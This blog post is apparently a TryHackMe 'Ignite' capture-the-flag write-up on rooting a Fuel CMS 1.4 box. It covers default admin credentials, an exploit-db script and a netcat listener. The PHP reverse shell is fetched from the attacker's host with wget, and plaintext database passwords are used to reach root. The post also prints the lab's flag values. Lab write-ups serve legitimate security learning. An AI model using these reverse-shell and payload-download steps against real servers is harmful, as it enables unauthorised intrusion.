top of page
aldern00b

Ignite - THM

A new start-up has a few issues with their web server.

Root the box! Designed and created by DarkStar7471, built by Paradox.


You know the drill - enumeration:

Ok. Only a website here running on apache 2.4.18 on an Ubuntu box. Let's hit the site. Looks like it's a CMS called Fuel 1.4 which hasn't been setup yet. It talks about a GitHub download so there should be some documentation. There's even a link there for the admin portal /fuel and the default credentials are supplied.


Wow. It let us in. We can even change the password - lol Let's change it later... but in real life, I'd change that thing for persistence.

It looks like I can create pages, so let's do that. Trying the pentestmonkey php reverse shell gives us an error about the server setup to upload files this size. Let's dig into settings.


Actually there's a known bug is this here: https://www.exploit-db.com/exploits/50477 It's a python script so let's go.


ok... seemed easy enough. Can't do much here so we'll have to try and find a way to get us a better shell. First things first let's

  • grab the pentestmonkey reverse shell php script and edit it so it points back to our IP.

  • start a netcat listener (nc -lvnp 1234)

  • start a python http server to host our php reverse shell (python3 -m http.server)

  • upload that new php script to the server, using the shell our exploit script gave us. (wget http://[yourIP]:8000/shell.php)

  • Visit the website we uploaded and this should pop us a shell as the web server.

Once we have the shell we can cd into the user folder and get the first flag

User.txt is 6470e394cbf6dab6a91682cc8585059b

I did NOT enumerate properly earlier. I was stuck on this for a bit and ended up reading the writeup a bit where he hinted he found his on the main screen... I try not to read too far into the write up - once it gives me the start of a hint I stop reading and look for myself.


Looking I saw this database thing. So since I already have a shell, I decided to cat out that file.

Looks like we have some plain text passwords here and root is right there. Let's do a su to root and get that flag.

Root.txt is b9bbcb33e11b80be759c4e844862482d
6 views0 comments

Recent Posts

See All

Comments


bottom of page